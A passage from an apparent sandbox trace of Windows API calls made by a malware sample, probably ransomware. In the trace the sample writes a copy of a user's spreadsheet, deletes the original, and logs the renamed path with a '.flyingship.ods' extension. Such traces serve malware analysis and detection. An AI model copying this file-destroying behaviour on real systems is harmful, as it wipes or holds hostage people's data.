lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.377] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0171.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd3d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.378] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.378] WriteFile (in: hFile=0x120, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x8f0a, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x8f0a, lpOverlapped=0x0) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0171.379] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.380] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0171.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.381] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.381] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpFilePart=0x0) returned 0x38 [0171.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xb81e900, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 0x90af58 [0171.382] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqvkybnjluto.ods")) returned 1 [0171.386] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xb81e900, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 0 [0171.386] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.389] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.390] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0171.390] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.390] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.391] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.391] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.391] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.391] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.392] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0171.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.392] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0171.392] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xeec, lpOverlapped=0x0) returned 1 [0171.393] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0171.393] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xeec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.393] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0171.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0171.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x46) returned 0x9aa4f8 [0171.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\n", cchWideChar=70, lpMultiByteStr=0x9aa4f8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\n", lpUsedDefaultChar=0x0) returned 70 [0171.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0171.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0171.394] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x45, lpOverlapped=0x0) returned 1 [0171.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0171.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.394] CloseHandle (hObject=0x120) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0171.395] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0171.395] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x8a0000, 